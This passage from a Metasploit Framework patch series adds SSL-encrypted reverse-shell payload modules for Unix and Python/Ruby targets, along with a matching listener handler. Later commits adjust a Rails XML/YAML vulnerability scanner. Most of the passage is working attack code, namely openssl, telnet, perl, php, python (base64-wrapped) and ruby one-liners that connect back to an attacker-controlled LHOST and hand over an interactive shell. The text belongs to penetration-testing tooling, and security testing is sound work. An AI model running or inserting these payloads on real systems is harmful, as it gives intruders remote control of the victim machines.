stdin/stdout and the two sockets + @monitor_thread = @framework.threads.spawn("ReverseTcpDoubleSSLHandlerMonitor", false) { + begin + while true + # Handle data from the server and write to the client + if (@sock_out.has_read_data?(0.50)) + buf = @sock_out.get_once + break if buf.nil? + rsock.put(buf) + end + end + rescue ::Exception => e + ilog("ReverseTcpDoubleSSL monitor thread raised #{e.class}: #{e}") + end + + # Clean up the sockets... + begin + @sock_inp.close + @sock_out.close + rescue ::Exception + end + } + end + + def write(buf, opts={}) + @sock_inp.write(buf, opts) + end + + def read(length=0, opts={}) + @sock_out.read(length, opts) + end + + # + # Closes the stream abstraction and kills the monitor thread. + # + def close + @monitor_thread.kill if (@monitor_thread) + @monitor_thread = nil + + cleanup_abstraction + end + + end + + +end + +end +end diff --git a/modules/payloads/singles/cmd/unix/reverse_openssl.rb b/modules/payloads/singles/cmd/unix/reverse_openssl.rb new file mode 100644 index 000000000000..ab9c0c2a130f --- /dev/null +++ b/modules/payloads/singles/cmd/unix/reverse_openssl.rb @@ -0,0 +1,58 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'msf/core/handler/reverse_tcp_double_ssl' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Single + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Unix Command Shell, Double reverse TCP SSL (openssl)', + 'Description' => 'Creates an interactive shell through two inbound connections', + 'Author' => 'hdm', + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Handler' => Msf::Handler::ReverseTcpDoubleSSL, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'openssl', + 'Payload' => + { + 'Offsets' => { }, + 'Payload' => '' + } + )) + end + + # + # Constructs the payload + # + def generate + return super + command_string + end + + # + # Returns the command string to use for execution + # + def command_string + cmd = + "sh -c '(sleep #{3600+rand(1024)}|" + + "openssl s_client -quiet -connect #{datastore['LHOST']}:#{datastore['LPORT']}|" + + "while : ; do sh && break; done 2>&1|" + + "openssl s_client -quiet -connect #{datastore['LHOST']}:#{datastore['LPORT']}" + + " >/dev/null 2>&1 &)'" + return cmd + end + +end From ffb88baf4a25f1f13b6e1ccfc8a8343e6a375bea Mon Sep 17 00:00:00 2001 From: RageLtMan <rageltman [at] sempervictus> Date: Sun, 3 Feb 2013 14:59:15 -0500 Subject: [PATCH 239/421] initial module import from SV rev_ssl branch --- lib/msf/core/handler/reverse_tcp_ssl.rb | 122 ++++++++++++++++++ lib/msf/core/module/platform.rb | 16 +++ modules/exploits/multi/handler.rb | 2 +- .../cmd/unix/reverse_bash_telnet_ssl.rb | 63 +++++++++ .../cmd/unix/reverse_openssl_double.rb | 68 ++++++++++ .../singles/cmd/unix/reverse_perl_ssl.rb | 63 +++++++++ .../singles/cmd/unix/reverse_php_ssl.rb | 61 +++++++++ .../singles/cmd/unix/reverse_python_ssl.rb | 79 ++++++++++++ .../singles/cmd/unix/reverse_ruby_ssl.rb | 49 +++++++ .../cmd/unix/reverse_ssl_double_telnet.rb | 67 ++++++++++ .../singles/python/shell_reverse_tcp_ssl.rb | 77 +++++++++++ .../singles/ruby/shell_reverse_tcp_ssl.rb | 52 ++++++++ 12 files changed, 718 insertions(+), 1 deletion(-) create mode 100644 lib/msf/core/handler/reverse_tcp_ssl.rb create mode 100644 modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb create mode 100644 modules/payloads/singles/cmd/unix/reverse_openssl_double.rb create mode 100644 modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb create mode 100644 modules/payloads/singles/cmd/unix/reverse_php_ssl.rb create mode 100644 modules/payloads/singles/cmd/unix/reverse_python_ssl.rb create mode 100644 modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb create mode 100644 modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb create mode 100644 modules/payloads/singles/python/shell_reverse_tcp_ssl.rb create mode 100644 modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb diff --git a/lib/msf/core/handler/reverse_tcp_ssl.rb b/lib/msf/core/handler/reverse_tcp_ssl.rb new file mode 100644 index 000000000000..60f827c7ab97 --- /dev/null +++ b/lib/msf/core/handler/reverse_tcp_ssl.rb @@ -0,0 +1,122 @@ +require 'rex/socket' +require 'thread' + +module Msf +module Handler + +### +# +# This module implements the reverse TCP handler. This means +# that it listens on a port waiting for a connection until +# either one is established or it is told to abort. +# +# This handler depends on having a local host and port to +# listen on. +# +### +module ReverseTcpSsl + + include Msf::Handler::ReverseTcp + + # + # Returns the string representation of the handler type, in this case + # 'reverse_tcp_ssl'. + # + def self.handler_type + return "reverse_tcp_ssl" + end + + # + # Returns the connection-described general handler type, in this case + # 'reverse'. + # + def self.general_handler_type + "reverse" + end + + # + # Initializes the reverse TCP SSL handler and adds the certificate option. + # + def initialize(info = {}) + super + register_advanced_options( + [ + OptPath.new('SSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)']) + ], Msf::Handler::ReverseTcpSsl) + + end + + # + # Starts the listener but does not actually attempt + # to accept a connection. Throws socket exceptions + # if it fails to start the listener. + # + def setup_handler + if datastore['Proxies'] + raise RuntimeError, 'TCP connect-back payloads cannot be used with Proxies' + end + + ex = false + # Switch to IPv6 ANY address if the LHOST is also IPv6 + addr = Rex::Socket.resolv_nbo(datastore['LHOST']) + # First attempt to bind LHOST. If that fails, the user probably has + # something else listening on that interface. Try again with ANY_ADDR. + any = (addr.length == 4) ? "0.0.0.0" : "::0" + + addrs = [ Rex::Socket.addr_ntoa(addr), any ] + + comm = datastore['ReverseListenerComm'] + if comm.to_s == "local" + comm = ::Rex::Socket::Comm::Local + else + comm = nil + end + + if not datastore['ReverseListenerBindAddress'].to_s.empty? + # Only try to bind to this specific interface + addrs = [ datastore['ReverseListenerBindAddress'] ] + + # Pick the right "any" address if either wildcard is used + addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0") + end + addrs.each { |ip| + begin + + comm.extend(Rex::Socket::SslTcp) + self.listener_sock = Rex::Socket::SslTcpServer.create( + 'LocalHost' => datastore['LHOST'], + 'LocalPort' => datastore['LPORT'].to_i, + 'Comm' => comm, + 'SSLCert' => datastore['SSLCert'], + 'Context' => + { + 'Msf' => framework, + 'MsfPayload' => self, + 'MsfExploit' => assoc_exploit + }) + + ex = false + + comm_used = comm || Rex::Socket::SwitchBoard.best_comm( ip ) + comm_used = Rex::Socket::Comm::Local if comm_used == nil + + if( comm_used.respond_to?( :type ) and comm_used.respond_to?( :sid ) ) + via = "via the #{comm_used.type} on session #{comm_used.sid}" + else + via = "" + end + + print_status("Started reverse SSL handler on #{ip}:#{datastore['LPORT']} #{via}") + break + rescue + ex = $! + print_error("Handler failed to bind to #{ip}:#{datastore['LPORT']}") + end + } + raise ex if (ex) + end + +end + +end +end diff --git a/lib/msf/core/module/platform.rb b/lib/msf/core/module/platform.rb index d1be479c301d..357c4e724be4 100644 --- a/lib/msf/core/module/platform.rb +++ b/lib/msf/core/module/platform.rb @@ -479,4 +479,20 @@ class PHP < Msf::Module::Platform Rank = 100 Alias = "php" end + + # + # JavaScript + # + class JavaScript < Msf::Module::Platform + Rank = 100 + Alias = "js" + end + + # + # Python + # + class Python < Msf::Module::Platform + Rank = 100 + Alias = "python" + end end diff --git a/modules/exploits/multi/handler.rb b/modules/exploits/multi/handler.rb index bf541b1d4760..7996ad52ef9c 100644 --- a/modules/exploits/multi/handler.rb +++ b/modules/exploits/multi/handler.rb @@ -32,7 +32,7 @@ def initialize(info = {}) 'BadChars' => '', 'DisableNops' => true, }, - 'Platform' => [ 'win', 'linux', 'solaris', 'unix', 'osx', 'bsd', 'php', 'java' ], + 'Platform' => [ 'win', 'linux', 'solaris', 'unix', 'osx', 'bsd', 'php', 'java','ruby','js','python' ], 'Arch' => ARCH_ALL, 'Targets' => [ [ 'Wildcard Target', { } ] ], 'DefaultTarget' => 0 diff --git a/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb new file mode 100644 index 000000000000..b675712c9aa0 --- /dev/null +++ b/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb @@ -0,0 +1,63 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'msf/core/handler/reverse_tcp_ssl' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Single + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Unix Command Shell, Reverse TCP SSL (telnet)', + 'Version' => '$Revision$', + 'Description' => %q{ + Creates an interactive shell via mknod and telnet. + This method works on Debian and other systems compiled + without /dev/tcp support. This module uses the '-z' + option included on some systems to encrypt using SSL. + }, + 'Author' => 'RageLtMan', + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Handler' => Msf::Handler::ReverseTcpSsl, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadType' => 'cmd_bash', + 'RequiredCmd' => 'bash-tcp', + 'Payload' => + { + 'Offsets' => { }, + 'Payload' => '' + } + )) + end + + # + # Constructs the payload + # + def generate + vprint_good(command_string) + return super + command_string + end + + # + # Returns the command string to use for execution + # + def command_string + pipe_name = Rex::Text.rand_text_alpha( rand(4) + 8 ) + cmd = "mknod #{pipe_name} p && telnet -z verify=0 #{datastore['LHOST']} #{datastore['LPORT']} 0<#{pipe_name} | $(which $0) 1>#{pipe_name} & sleep 10 && rm #{pipe_name} &" + end +end diff --git a/modules/payloads/singles/cmd/unix/reverse_openssl_double.rb b/modules/payloads/singles/cmd/unix/reverse_openssl_double.rb new file mode 100644 index 000000000000..2343ed2d69fd --- /dev/null +++ b/modules/payloads/singles/cmd/unix/reverse_openssl_double.rb @@ -0,0 +1,68 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'msf/core/handler/reverse_tcp_double_ssl' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Single + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Unix Command Shell, Double reverse TCP SSL (openssl)', + 'Version' => '$Revision$', + 'Description' => 'Creates an interactive shell through two openssl encrypted inbound connections', + 'Author' => [ + 'hdm', # Original module + 'RageLtMan', # SSL support + ], + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Handler' => Msf::Handler::ReverseTcpDoubleSsl, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'telnet', + 'Payload' => + { + 'Offsets' => { }, + 'Payload' => '' + } + )) + end + + # + # Constructs the payload + # + def generate + vprint_good(command_string) + return super + command_string + end + + # + # Returns the command string to use for execution + # + def command_string + lhost = datastore['LHOST'] + ver = Rex::Socket.is_ipv6?(lhost) ? "6" : "" + lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) + cmd = '' + cmd += "openssl s_client -connect #{lhost}:#{datastore['LPORT']}|" + cmd += "/bin/sh -i|openssl s_client -connect #{lhost}:#{datastore['LPORT']}" + cmd += " >/dev/null 2>&1 &\n" + return cmd + end + +end diff --git a/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb new file mode 100644 index 000000000000..96724f20e753 --- /dev/null +++ b/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb @@ -0,0 +1,63 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'msf/core/handler/reverse_tcp_ssl' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Single + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Unix Command Shell, Reverse TCP SSL (via perl)', + 'Version' => '$Revision$', + 'Description' => 'Creates an interactive shell via perl, uses SSL', + 'Author' => 'RageLtMan', + 'License' => BSD_LICENSE, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Handler' => Msf::Handler::ReverseTcpSsl, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'perl', + 'Payload' => + { + 'Offsets' => { }, + 'Payload' => '' + } + )) + end + + # + # Constructs the payload + # + def generate + vprint_good(command_string) + return super + command_string + end + + # + # Returns the command string to use for execution + # + def command_string + lhost = datastore['LHOST'] + ver = Rex::Socket.is_ipv6?(lhost) ? "6" : "" + lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) + cmd = "perl -e 'use IO::Socket::SSL;$p=fork;exit,if($p);" + cmd += "$c=IO::Socket::SSL->new(\"#{lhost}:#{datastore['LPORT']}\");" + cmd += "while(sysread($c,$i,8192)){syswrite($c,`$i`);}'" + end + +end diff --git a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb new file mode 100644 index 000000000000..9892515e26a5 --- /dev/null +++ b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb @@ -0,0 +1,61 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'msf/core/handler/reverse_tcp_ssl' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Single + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Unix Command Shell, Reverse TCP SSL (via php)', + 'Version' => '$Revision$', + 'Description' => 'Creates an interactive shell via php, uses SSL', + 'Author' => 'RageLtMan', + 'License' => BSD_LICENSE, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Handler' => Msf::Handler::ReverseTcpSsl, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'php', + 'Payload' => + { + 'Offsets' => { }, + 'Payload' => '' + } + )) + end + + # + # Constructs the payload + # + def generate + vprint_good(command_string) + return super + command_string + end + + # + # Returns the command string to use for execution + # + def command_string + lhost = datastore['LHOST'] + ver = Rex::Socket.is_ipv6?(lhost) ? "6" : "" + lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) + cmd = "php -r '$s=fsockopen(\"ssl://#{datastore['LHOST']}\",#{datastore['LPORT']});while(!feof($s)){exec(fgets($s),$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}'&" + end + +end diff --git a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb new file mode 100644 index 000000000000..a7e232d24b35 --- /dev/null +++ b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb @@ -0,0 +1,79 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'msf/core/handler/reverse_tcp_ssl' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Single + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Unix Command Shell, Reverse TCP SSL (via python)', + 'Version' => '$Revision$', + 'Description' => 'Creates an interactive shell via python, uses SSL, encodes with base64 by design.', + 'Author' => 'RageLtMan', + 'License' => BSD_LICENSE, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Handler' => Msf::Handler::ReverseTcpSsl, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'python', + 'Payload' => + { + 'Offsets' => { }, + 'Payload' => '' + } + )) + end + + # + # Constructs the payload + # + def generate + vprint_good(command_string) + return super + command_string + end + + # + # Returns the command string to use for execution + # + def command_string + cmd = '' + dead = Rex::Text.rand_text_alpha(2) + # Set up the socket + cmd += "import socket,subprocess,os,ssl\n" + cmd += "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n" + cmd += "so.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n" + cmd += "s=ssl.wrap_socket(so)\n" + # The actual IO + cmd += "#{dead}=False\n" + cmd += "while not #{dead}:\n" + cmd += "\tdata=s.recv(1024)\n" + cmd += "\tif len(data)==0:\n\t\t#{dead} = True\n" + cmd += "\tproc=subprocess.Popen(data,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n" + cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n" + cmd += "\ts.send(stdout_value)\n" + + # The *nix shell wrapper to keep things clean + # Base64 encoding is required in order to handle Python's formatting requirements in the while loop + cmd = "python -c \"exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))\"" + cmd += ' >/dev/null 2>&1 &' + return cmd + + end + +end diff --git a/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb new file mode 100644 index 000000000000..6743def9e98e --- /dev/null +++ b/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb @@ -0,0 +1,49 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'msf/core/handler/reverse_tcp_ssl' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Single + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Unix Command Shell, Reverse TCP SSL (via Ruby)', + 'Version' => '$Revision$', + 'Description' => 'Connect back and create a command shell via Ruby, uses SSL', + 'Author' => 'RageLtMan', + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Handler' => Msf::Handler::ReverseTcpSsl, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'ruby', + 'Payload' => { 'Offsets' => {}, 'Payload' => '' } + )) + end + + def generate + vprint_good(command_string) + return super + command_string + end + + def command_string + lhost = datastore['LHOST'] + lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) + "ruby -rsocket -ropenssl -e 'exit if fork;c=OpenSSL::SSL::SSLSocket.new(TCPSocket.new(\"#{lhost}\",\"#{datastore['LPORT']}\")).connect;while(cmd=c.gets);IO.popen(cmd.to_s,\"r\"){|io|c.print io.read}end'" + end +end diff --git a/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb b/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb new file mode 100644 index 000000000000..67af0c90728f --- /dev/null +++ b/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb @@ -0,0 +1,67 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'msf/core/handler/reverse_tcp_double_ssl' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Single + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Unix Command Shell, Double reverse TCP SSL (telnet)', + 'Version' => '$Revision$', + 'Description' => 'Creates an interactive shell through two inbound connections, encrypts using SSL via "-z" option', + 'Author' => [ + 'hdm', # Original module + 'RageLtMan', # SSL support + ], + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Handler' => Msf::Handler::ReverseTcpDoubleSsl, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'telnet', + 'Payload' => + { + 'Offsets' => { }, + 'Payload' => '' + } + )) + end + + # + # Constructs the payload + # + def generate + + return super + command_string + end + + # + # Returns the command string to use for execution + # + def command_string + cmd = + "sh -c '(sleep #{3600+rand(1024)}|" + + "telnet -z #{datastore['LHOST']} #{datastore['LPORT']}|" + + "while : ; do sh && break; done 2>&1|" + + "telnet -z #{datastore['LHOST']} #{datastore['LPORT']}" + + " >/dev/null 2>&1 &)'" + return cmd + end + +end diff --git a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb new file mode 100644 index 000000000000..ca70b1087924 --- /dev/null +++ b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb @@ -0,0 +1,77 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'msf/core/handler/reverse_tcp_ssl' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Single + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Unix Command Shell, Reverse TCP SSL (via python)', + 'Version' => '$Revision$', + 'Description' => 'Creates an interactive shell via python, uses SSL, encodes with base64 by design.', + 'Author' => 'RageLtMan', + 'License' => BSD_LICENSE, + 'Platform' => 'python', + 'Arch' => ARCH_CMD, + 'Handler' => Msf::Handler::ReverseTcpSsl, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadType' => 'python', + 'Payload' => + { + 'Offsets' => { }, + 'Payload' => '' + } + )) + end + + # + # Constructs the payload + # + def generate + vprint_good(command_string) + return super + command_string + end + + # + # Returns the command string to use for execution + # + def command_string + cmd = '' + dead = Rex::Text.rand_text_alpha(2) + # Set up the socket + cmd += "import socket,subprocess,os,ssl\n" + cmd += "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n" + cmd += "so.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n" + cmd += "s=ssl.wrap_socket(so)\n" + # The actual IO + cmd += "#{dead}=False\n" + cmd += "while not #{dead}:\n" + cmd += "\tdata=s.recv(1024)\n" + cmd += "\tif len(data)==0:\n\t\t#{dead} = True\n" + cmd += "\tproc=subprocess.Popen(data,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n" + cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n" + cmd += "\ts.send(stdout_value)\n" + + # The *nix shell wrapper to keep things clean + # Base64 encoding is required in order to handle Python's formatting requirements in the while loop + cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))" + return cmd + + end + +end diff --git a/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb new file mode 100644 index 000000000000..82f61c768d6b --- /dev/null +++ b/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb @@ -0,0 +1,52 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'msf/core/payload/ruby' +require 'msf/core/handler/reverse_tcp_ssl' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Single + include Msf::Payload::Ruby + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Ruby Command Shell, Reverse TCP SSL', + 'Version' => '$Revision$', + 'Description' => 'Connect back and create a command shell via Ruby, uses SSL', + 'Author' => 'RageLtMan', + 'License' => MSF_LICENSE, + 'Platform' => 'ruby', + 'Arch' => ARCH_RUBY, + 'Handler' => Msf::Handler::ReverseTcpSsl, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadType' => 'ruby', + 'Payload' => { 'Offsets' => {}, 'Payload' => '' } + )) + end + + def generate + rbs = prepends(ruby_string) + vprint_good rbs + return rbs + end + + def ruby_string + lhost = datastore['LHOST'] + lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) + rbs = "require 'socket';require 'openssl';c=OpenSSL::SSL::SSLSocket.new(TCPSocket.new(\"#{lhost}\",\"#{datastore['LPORT']}\")).connect;while(cmd=c.gets);IO.popen(cmd.to_s,\"r\"){|io|c.print io.read}end" + return rbs + end +end From 810470de3bcb9d7719994e4b8de24d30e3c7721a Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Sun, 3 Feb 2013 16:05:45 -0600 Subject: [PATCH 240/421] Make HTTP_METHOD Configurable --- modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb b/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb index 900b8f331371..c9907e5adb96 100644 --- a/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb +++ b/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb @@ -29,7 +29,8 @@ def initialize(info={}) )) register_options([ - OptString.new('URIPATH', [true, "The URI to test", "/"]) + OptString.new('URIPATH', [true, "The URI to test", "/"]), + OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "POST"]) ], self.class) end @@ -37,7 +38,7 @@ def send_probe(ptype, pdata) odata = %Q^<?xml version="1.0" encoding="UTF-8"?>\n<probe type="#{ptype}"><![CDATA[\n#{pdata}\n]]></probe>^ res = send_request_cgi({ 'uri' => datastore['URIPATH'] || "/", - 'method' => 'POST', + 'method' => datastore['HTTP_METHOD'], 'ctype' => 'application/xml', 'data' => odata }, 25) From 8dff42777695ba10e9012960b1f3aa8045134bfe Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Sun, 3 Feb 2013 16:07:07 -0600 Subject: [PATCH 241/421] Allow 4xx codes, display codes in verbose output --- modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb b/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb index c9907e5adb96..64d25eb52051 100644 --- a/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb +++ b/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb @@ -65,11 +65,13 @@ def run_host(ip) return end - if res1.code.to_s =~ /^[45]/ + vprint_status("Probe response codes: #{res1.code} / #{res2.code} / #{res3.code}") + + if res1.code.to_s =~ /^[5]/ vprint_status("#{rhost}:#{rport} The server replied with #{res1.code} for our initial XML request, double check URIPATH") end - if res2.code.to_s =~ /^[23]/ and res3.code != res2.code and res3.code != 200 + if (res2.code == res1.code) and (res3.code != res2.code) and (res3.code != 200) print_good("#{rhost}:#{rport} is likely vulnerable due to a #{res3.code} reply for invalid YAML") report_vuln({ :host => rhost, From 57c8e41846615393e0c521645e0ad51e61a49a8b Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Sun, 3 Feb 2013 16:10:46 -0600 Subject: [PATCH 242/421] Re-order probes and checks. This causes module to exit if error conditions are found, before sending unecessary probes. --- .../scanner/http/rails_xml_yaml_scanner.rb | 16 ++++++++++------ 1 file changed, 10 insertions(+), 6 deletions(-) diff --git a/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb b/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb index 64d25eb52051..e55f6f571d8d 100644 --- a/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb +++ b/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb @@ -47,19 +47,26 @@ def send_probe(ptype, pdata) def run_host(ip) res1 = send_probe("string", "hello") - res2 = send_probe("yaml", "--- !ruby/object:Time {}\n") - res3 = send_probe("yaml", "--- !ruby/object:\x00") unless res1 vprint_status("#{rhost}:#{rport} No reply to the initial XML request") return end + if res1.code.to_s =~ /^[5]/ + vprint_status("#{rhost}:#{rport} The server replied with #{res1.code} for our initial XML request, double check URIPATH") + return + end + + res2 = send_probe("yaml", "--- !ruby/object:Time {}\n") + unless res2 vprint_status("#{rhost}:#{rport} No reply to the initial YAML probe") return end + res3 = send_probe("yaml", "--- !ruby/object:\x00") + unless res3 vprint_status("#{rhost}:#{rport} No reply to the second YAML probe") return @@ -67,9 +74,6 @@ def run_host(ip) vprint_status("Probe response codes: #{res1.code} / #{res2.code} / #{res3.code}") - if res1.code.to_s =~ /^[5]/ - vprint_status("#{rhost}:#{rport} The server replied with #{res1.code} for our initial XML request, double check URIPATH") - end if (res2.code == res1.code) and (res3.code != res2.code) and (res3.code != 200) print_good("#{rhost}:#{rport} is likely vulnerable due to a 